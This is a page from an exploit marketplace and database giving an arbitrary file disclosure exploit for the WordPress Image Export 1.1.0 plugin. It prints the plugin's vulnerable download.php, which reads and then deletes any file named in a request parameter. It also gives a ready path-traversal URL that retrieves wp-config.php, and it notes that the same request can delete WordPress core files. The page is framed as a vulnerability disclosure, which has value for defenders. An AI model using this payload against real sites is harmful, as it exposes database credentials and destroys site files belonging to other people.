[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Image Export 1.1.0 Plugin - Arbitrary File Disclosure

Author
AMAR^SHG
Risk
[
Security Risk High
]
0day-ID
0day-ID-24966
Category
web applications
Date add
21-03-2016
Platform
php
# Exploit Title: Wordpress image-export LFD
# Date: 03/21/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: http://www.1efthander.com
# Software Link:
http://www.1efthander.com/category/wordpress-plugins/image-export
# Version: Everything is affected including latest (1.1.0 )
# Tested on: Windows/Unix on localhost
 
download.php file code:
 
<?php
if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
    $file = $_GET['file'];
 
    header( 'Content-Type: application/zip' );
    header( 'Content-Disposition: attachment; filename="' . $file . '"' );
    readfile( $file );
    unlink( $file );
     
    exit;
}
?>
 
Proof of concept:
 
Note that because of the unlink, we potentially can destroy the wordpress core.
 
Simply add the get parameter file:
 
localhost/wp/wp-content/plugins/image-export/download.php?file=../../../wp-config.php
 
Found by AMAR^SHG (Shkupi Hackers Group)

#  0day.today [2024-07-05]  #